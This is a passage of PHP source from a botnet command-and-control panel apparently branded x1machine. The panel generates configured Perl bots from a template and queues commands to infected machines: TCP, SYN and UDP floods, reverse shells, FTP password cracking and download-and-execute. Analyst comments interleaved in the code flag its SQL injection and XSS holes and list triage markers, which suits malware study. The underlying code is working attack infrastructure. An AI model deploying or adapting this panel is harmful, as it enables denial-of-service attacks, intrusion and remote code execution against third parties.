  559. <tr><td align = 'left'><font color='orange'><small>Max Upload Size:</small></font></td><td>".$POST_MAX_SIZE."</td></tr>
  560. <tr><td align = 'left'><font color='orange'><small>Max Post Size:</small></font></td><td>".$UP_MAX_SIZE."</td></tr>
  561. <tr><td align = 'left'><font color='orange'><small>Select new dictionary file:</small></font></td><td><input name='dict_file' type='file' size='50'></td></tr>
  562. <tr><td></td><td align = 'left'><input type=\"submit\" value=\" Upload \" name=\"action\"></td></tr>
  563. ";
  564. if(!is_null($_POST['action'])){
  // basename() strips any directory part from the client-supplied name.
  565. $target_path = basename( $_FILES['dict_file']['name']);
  566. if($target_path != NULL){
  // Only the text after the last "." is checked, case-sensitively, against
  // $ext. The rejected name is echoed unescaped in the die() message, and
  // $_FILES[...]['error'] is never inspected.
  567. if(!in_array(strrchr($target_path,'.'),$ext)) die ("Bad file extension! $target_path");
  // An existing file with the same name is overwritten.
  568. if(move_uploaded_file($_FILES['dict_file']['tmp_name'], $DICTIONARY_PATH.$target_path)) {
  569. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  570. } else{
  571. print ("<br>Error uploading dictionary file!<br>");
  572. }
  573. }
  574. }
  575. echo "</table><br></center>
  576. <center><font size='1'>&copy www.x1machine.com</font></center>
  577. </div></center>
  578. </body></html>";
  579. exit();
  580. }
  // Bottom panel of the generator view: renders the submit button and, on
  // submit, produces a configured copy of the template file by substituting
  // fixed placeholder tokens with the posted form values.
  581. if($_GET['page'] == "config") {
  582. echo "
  583. <br>
  584. <tr><td></td><td><input type='submit' value='Generate New Hybrid Bot' name='generate_new_hybrid_bot'></td></tr>
  585. ";
  // The closing </body></html> is sent before the form is processed, so the
  // status messages below are emitted after the end of the document.
  586. echo "</table><br></center>
  587. <center><font size='1'>&copy www.x1machine.com</font></center>
  588. </div></center>
  589. </body></html>";
  590. if(!is_null($_POST['generate_new_hybrid_bot'])){
  // Template input and generated output, both relative to this script.
  591. $file = 'bot/test.txt';
  592. $bot_file = "bot/bot.zip";
  // Placeholder tokens expected in the template. They are fixed strings, so an
  // unconfigured template can be recognised by the "_by_x1machine" suffix.
  593. $search = array('hybrid_user_agent_by_x1machine', // user agent [1]
  594. 'hybrid_wwwfolder_name_by_x1machine', // web gate dir [2]
  595. 'hybrid_hell_gate_by_x1machine', // gate script name [3]
  596. 'hybrid_home_by_x1machine', // home server [4]
  597. 'hybrid_home_port_by_x1machine', // maybe you running web server on non-standard port? [5]
  598. 'hybrid_sleep_time_by_x1machine', // default bot time for staying inactive [6]
  599. 'hybrid_autostart_by_x1machine', // autostart file, in most cases /etc/passwd [7]
  600. 'hybrid_local_dir_by_x1machine', // dir on host machine where to store our bot [8]
  601. 'hybrid_base_name_by_x1machine'); // bot's base name [9]
  // Posted values go through htmlspecialchars(addslashes()) before they are
  // substituted, so quotes and HTML metacharacters reach the generated file in
  // escaped form. The //1..//9 markers here number the form fields and do not
  // line up with the [1]..[9] positions of $search/$replace.
  602. $bot_name = htmlspecialchars(addslashes($_POST['bot_name'])); //1
  603. $bot_dir = htmlspecialchars(addslashes($_POST['bot_dir'])); //2
  604. $def_sleep_time = htmlspecialchars(addslashes($_POST['def_sleep_time'])); //3
  605. $home_server = htmlspecialchars(addslashes($_POST['home_server'])); //4
  606. $home_server_port = htmlspecialchars(addslashes($_POST['home_server_port'])); //5
  607. $gate_dir = htmlspecialchars(addslashes($_POST['gate_dir'])); //6
  608. $gate_script = htmlspecialchars(addslashes($_POST['gate_script'])); //7
  609. $bot_ua = htmlspecialchars(addslashes($_POST['bot_ua'])); //8
  610. $autostart_file = htmlspecialchars(addslashes($_POST['autostart_file'])); //9
  // Truthiness test: a field holding "0" is treated as missing.
  611. if(!$bot_name || !$bot_dir || !$def_sleep_time || !$home_server ||
  612. !$home_server_port || !$gate_dir || !$gate_script || !$bot_ua ||
  613. !$autostart_file) {
  614. die("<center><h3><font color='red'>All fields must be filled!</font></h3></center>");
  615. }
  // Replacement values, in the same order as $search.
  616. $replace = array($bot_ua, // [1] $bot_ua
  617. $gate_dir, // [2] $gate_dir
  618. $gate_script, // [3] $gate_script
  619. $home_server, // [4] $home_server
  620. $home_server_port, // [5] $home_server_port
  621. $def_sleep_time, // [6] $def_sleep_time
  622. $autostart_file, // [7] $autostart_file
  623. $bot_dir, // [8] $bot_dir
  624. $bot_name); // [9] $bot_name
  // The result of file() is not checked. The output is plain substituted text
  // written under a .zip name, and is overwritten on every run.
  625. $lines = file($file);
  626. $HANDLE = fopen($bot_file, 'w') or die("<center><h3><font color='red'>can't open bot file!</font></h3></center>");
  627. foreach($lines as $line_num => $line) {
  628. $text = str_replace($search, $replace, $line);
  629. fwrite($HANDLE, $text);
  630. // print $text;
  631. }
  632. fclose($HANDLE);
  633. print "<center><h3><font color='oragne'>Bot Created! Download .zip file and change extension to .pl</font></h3></center>";
  // NOTE(review): the redirect targets bot/bot.pl on the posted home server,
  // while the file written above is bot/bot.zip.
  634. echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"3; url='http://$home_server/bot/bot.pl'\">";
  635. }
  636. exit();
  637. }
  638. if($_GET['page'] == "help") {
       // Help page of the operator panel, selected by page=help in the query string.
       // This branch prints a static <SELECT name='help_section'> of help topics and a submit
       // button, closes the page markup and stops the script. It runs no query and echoes no
       // request data.
       // Analyst note: the option values and labels below enumerate the command set this panel
       // documents (sleep, TCP/SYN/UDP storm, bot deletion, reverse shell, E.R.T.E., FTP crack,
       // download & execute). The literal strings are stable content markers when triaging a
       // web root or a disk image for this kit.
  639. echo "<br>
  640. <tr><td><font color='orange'><small>Select help section:</small></font></td><td>
  641. <SELECT name='help_section' style='width:365px'>";
       // The two commented-out lines below (and the stray closing brace further down) look like
       // the remains of a database-driven version of this list; they are dead code.
  642. //$res = mysql_query("SELECT ip FROM $table");
  643. //while ($row = mysql_fetch_assoc($res)) {
  644. print("<OPTION value = 'about' selected>About</OPTION>");
  645. print("<OPTION value = 'sep1' >---------------------------------------------------</OPTION>");
  646. print("<OPTION value = 'terminal_about' >About E.R.T.E.</OPTION>");
  647. print("<OPTION value = 'stats_about' >About Statistics</OPTION>");
  648. print("<OPTION value = 'hygen_about' >About Hybrid Generator</OPTION>");
  649. print("<OPTION value = 'dict_about' >About Dictionary Files</OPTION>");
  650. print("<OPTION value = 'ftpcrack_about' >About Ftp Cracking</OPTION>");
  651. print("<OPTION value = 'sep2' >---------------------------------------------------</OPTION>");
  652. print("<OPTION value = 'sleep_cmd_help' >Sleep Command Help</OPTION>");
  653. print("<OPTION value = 'tcpstorm_cmd_help' >TCP Storm Command Help</OPTION>");
  654. print("<OPTION value = 'synstorm_cmd_help' >SYN Storm Command Help</OPTION>");
  655. print("<OPTION value = 'udp_cmd_help' >UDP Storm Command Help</OPTION>");
  656. print("<OPTION value = 'delbot_cmd_help' >Delete Bot Command Help</OPTION>");
  657. print("<OPTION value = 'revsh_cmd_help' >Reverse Shell Command Help</OPTION>");
  658. print("<OPTION value = 'erte_cmd_help' >E.R.T.E Command Help</OPTION>");
  659. print("<OPTION value = 'ftpcrack_cmd_help' >FTP Crack Command Help</OPTION>");
  660. print("<OPTION value = 'dlexec_cmd_help' >Download &amp; Execute Command Help</OPTION>");
  661. //}
  662. echo "
  663. </SELECT>
  664. </td>
  665. </tr>
  666. <tr><td></td><td><input type='submit' value='Show Help Information' name='show_help'></td></tr>
  667. ";
  668. echo "</table><br></center>
  669. <center><font size='1'>&copy www.x1machine.com</font></center>
  670. </div></center>
  671. </body></html>";
  672. exit(); // nothing after this branch runs for page=help
  673. }
  674. if($_GET['page'] == "") {
       // Default view: taken when page is empty (with loose ==, an absent parameter compares
       // equal as well). It shows the stored E.R.T.E. ip:port pair, offers a form to change it,
       // and handles that form's POST further down.
       // The mysql_* functions used here were removed in PHP 7, so this file only runs on PHP 5.x.
  675. $current_ip = ""; $current_port = "";
  676. $res = mysql_query("SELECT * FROM $table_erte_configuration");
       // Every row overwrites the two variables, so the last row returned is the one displayed.
       // $row[ip] and $row[port] use bare words as keys: PHP 5 falls back to the strings 'ip'
       // and 'port' with a notice, PHP 8 raises an error.
  677. while ($row = mysql_fetch_assoc($res)) {
  678. $current_ip = $row[ip];
  679. $current_port = $row[port];
  680. }
       // The stored values are written into the page as-is; no escaping happens at output time.
  681. echo "
  682. <tr><td><font color='orange'><small>Current Configuration:</small></font></td><td><b>".$current_ip.":".$current_port."</b></td></tr>
  683. ";
  684. echo "<tr>
  685. <td><font color=\"orange\"><small>Bot IP:</small></font></td>
  686. <td>";
  687. echo "<SELECT name=\"botip\" style=\"width:365px\"> ";
       // One <OPTION> per row of $table, with the ip column as both value and label.
       // NOTE(review): the value lands in an unquoted attribute with no output escaping. How the
       // ip column gets populated is not visible in this excerpt, so treat it as untrusted when
       // viewing a recovered copy of this page.
  688. $res = mysql_query("SELECT ip FROM $table");
  689. while ($row = mysql_fetch_assoc($res)) {
  690. print("<OPTION value=".$row[ip].">".$row[ip]."</OPTION>");
  691. }
  692. echo "</SELECT>
  693. </td>
  694. </tr>";
  695. echo "<tr>
  696. <td><font color='orange'><small>Port:</small></font></td>
  697. <td><input type='text' name='remo_port' value='' size='50'></td>
  698. </tr>
  699. <tr><td></td><td><input type='submit' value='Set Configuration' name='set_current_config'> <input type='reset' name='Submit2' value='Clear'></td></tr>
  700. ";
  701. echo "</form></table></center>
  702. <center><font size='1'>&copy www.x1machine.com</font></center>
  703. </div></center>
  704. </body></html>";
       // The POST handler runs only after the closing </html> has been sent, so the redirect
       // script below is appended after the end of the document.
  705. if(!is_null($_POST['set_current_config'])){
       // addslashes followed by htmlspecialchars is the only treatment before the values are
       // interpolated into SQL. addslashes is not charset-aware and is not a substitute for
       // parameterised queries. Nothing checks that the port is numeric or the ip is an address.
  706. $ip = htmlspecialchars(addslashes($_POST['botip']));
  707. $port = htmlspecialchars(addslashes($_POST['remo_port']));
  708. if($ip && $port){ // truthiness test: a port of "0" is silently ignored
  709. $res = mysql_query("SELECT ip FROM $table_erte_configuration");
  710. $total_entries = mysql_num_rows($res);
  711. if($total_entries > 0){
       // No WHERE clause: every existing configuration row is overwritten with the new pair.
  712. mysql_query("UPDATE $table_erte_configuration SET ip = '$ip', port = '$port'");
  713. echo "<script>location=\"index.php\";</script>";
  714. } else {
       // Table is empty: create the single configuration row.
  715. mysql_query("INSERT INTO $table_erte_configuration (ip, port) VALUES ('$ip', '$port')");
  716. echo "<script>location=\"index.php\";</script>";
  717. }
  718. }
  719. }
  720. exit(); // the command form further down the file is never reached from the default view
  721. }
  722. ?>
  723. <tr>
  724. <td><font color="orange"><small>Bot Name:</small></font></td>
  725. <td>
  726. <!--
  727. <form name="form1" method="post" action="" enctype="multipart/form-data">
  728. -->
  729. <SELECT name="botip" style="width:365px">
  730. <?php
  731. if($_GET['page'] == "stats") {
       // Fills the botip <SELECT> of the command form. On the stats page two pseudo-targets are
       // added first; the command handler later in this file treats 'all' and 'checked' as
       // "every bot" and "the bots ticked in the box[] checkboxes" instead of a bot name.
  732. echo "<OPTION value='all'>All</OPTION>";
  733. echo "<OPTION value='checked'>Checked</OPTION>";
  734. }
       // One option per row of $table, keyed by the name column ($row[name] is a bare-word key,
       // which PHP 5 reads as the string 'name').
       // NOTE(review): the name is written into an unquoted attribute and into the label without
       // output escaping. Where the name column comes from is outside this excerpt.
  735. $res = mysql_query("SELECT name FROM $table");
  736. while ($row = mysql_fetch_assoc($res)) {
  737. print("<OPTION value=".$row[name].">".$row[name]."</OPTION>");
  738. }
  739. ?>
  740. </SELECT>
  741. </td>
  742. </tr>
  743. <tr><td><font color="orange"><small>Command:</small></font></td>
  744. <td>
  745. <SELECT name="newcmd" style="width:365px">
  746. <OPTION value="sleep" selected>Sleep-[time(in secs)]</OPTION>
  747. <OPTION value="ddos">TCP Storm-[Host]-[Port]-[Delay(0/1)]-[Packets]</OPTION>
  748. <OPTION value="syn">SYN Storm-[Host]-[Port]-[Delay(0/1)]-[Packets]</OPTION>
  749. <OPTION value="udpstorm">UDP Storm-[Host]-[Port]-[Time(sec)]-[Delay(0/1)]</OPTION>
  750. <OPTION value="selfdel">Delete Bot from remote machine</OPTION>
  751. <OPTION value="revsh">Reverse Shell-[Host]-[Port]</OPTION>
  752. <OPTION value="remterm">E.R.T.E.-[Bot's Port]</OPTION>
  753. <OPTION value="ftpcrack">FTP Crack -[Ftp Host]</OPTION>
  754. <OPTION value="dl_exec">Download &amp; Execute -[Remote Host]-[Path 2 File]-[Local File]</OPTION>
  755. </SELECT>
  756. </td></tr>
  757. <tr>
  758. <td><font color="orange"><small>Argument 1:</small></font></td>
  759. <td><input type="text" name="arg1" value="" size="50"></td>
  760. </tr>
  761. <tr>
  762. <td><font color="orange"><small>Argument 2:</small></font></td>
  763. <td><input type="text" name="arg2" value="" size="50"></td>
  764. </tr>
  765. <tr>
  766. <td><font color="orange"><small>Argument 3:</small></font></td>
  767. <td><input type="text" name="arg3" value="" size="50"></td>
  768. </tr>
  769. <tr>
  770. <td><font color="orange"><small>Argument 4:</small></font></td>
  771. <td><input type="text" name="arg4" value="" size="50"></td>
  772. </tr>
  773. <tr><td></td><td><input type="submit" value="Set Command" name="set"> <input type="reset" name="Submit2" value="Clear"></td></tr>
  774. </form>
  775. <?php
  776. if(!is_null($_POST['set'])){
       // Handler for the "Set Command" form: stores a pending command in the cmd column of
       // $table for one bot, for the ticked bots, or for all bots.
       // Record format (useful when reading a recovered database): the command identifier and
       // the four arguments joined with '!', i.e. newcmd!arg1!arg2!arg3!arg4. Empty arguments
       // leave consecutive '!' characters. The joined string is passed through addslashes and
       // then htmlspecialchars, so HTML-special characters are stored entity-encoded.
       // How bots retrieve the cmd value is not shown in this excerpt.
  777. $newcmd = htmlspecialchars(addslashes($_POST['newcmd']."!".$_POST['arg1']."!".$_POST['arg2']."!".$_POST['arg3']."!".$_POST['arg4']));
  778. $crycmd = $newcmd; // plain copy: no encoding or encryption is applied despite the name
  779. $botip = htmlspecialchars(addslashes($_POST['botip']));
  780. dbconnection($host, $login, $password, $database);
  781. if($botip == "all"){
       // ftpcrack is rejected for the 'all' target: the page is closed and the script stops.
  782. if($_POST['newcmd'] == "ftpcrack"){
  783. echo "Selecting all bots for this command is not implemented!</table></center>
  784. <center><font size='1'>&copy www.x1machine.com</font></center>
  785. </div></center></body></html>";
  786. exit();
  787. }
       // No WHERE clause: the command is written to every row of $table.
  788. mysql_query("UPDATE $table SET cmd='$crycmd'");
       // NOTE(review): $_GET['page'] is reflected into the inline script without escaping,
       // here and in every redirect below.
  789. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  790. } else if ($botip == "checked"){
  791. if($_POST['newcmd'] == "ftpcrack"){
  792. echo "Selecting checked bots for this command is not implemented!</table></center>
  793. <center><font size='1'>&copy www.x1machine.com</font></center>
  794. </div></center></body></html>";
  795. exit();
  796. }
       // NOTE(review): the box values are used as-is in the WHERE clause. Unlike botip and the
       // command string they do not go through addslashes/htmlspecialchars, and foreach assumes
       // box is an array. The redirect script is also emitted once per selected bot.
  797. $box = $_POST['box'];
  798. foreach ( $box as $k=> $c)
  799. {
  800. mysql_query("UPDATE $table SET cmd='$crycmd' WHERE name='$c'");
  801. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  802. }
  803. } else {
       // Single bot selected by name.
  804. if($_POST['newcmd'] == "ftpcrack"){
       // For ftpcrack the stored command is rebuilt as ftpcrack!ip!port!dict, with port and
       // dict looked up in $ftp_table for the ip given in arg1 (last matching row wins); the
       // arg2..arg4 form values are discarded.
       // NOTE(review): arg1 is taken raw from the request and interpolated into the SELECT
       // and, through $crycmd, into the UPDATE with no escaping at all.
  805. $ips = $_POST['arg1'];
  806. $ports = ""; $dict_file = "";
  807. $res = mysql_query("SELECT * FROM $ftp_table WHERE ip = '$ips'");
  808. while ($row = mysql_fetch_assoc($res)) {
  809. $ports = $row[port]; $dict_file = $row[dict];
  810. }
  811. $newcmd = "ftpcrack!".$ips."!".$ports."!".$dict_file;
  812. $crycmd = $newcmd ;
  813. mysql_query("UPDATE $table SET cmd='$crycmd' WHERE name='$botip'");
  814. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  815. } else {
       // Any other command: store the '!'-joined string built at the top for the named bot.
  816. mysql_query("UPDATE $table SET cmd='$crycmd' WHERE name='$botip'");
  817. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  818. }}
  819. }
  820. ?>
  821. </table></center>
  822. <center><font size='1'>&copy www.x1machine.com</font></center>
  823. </div></center>
  824. </body></html>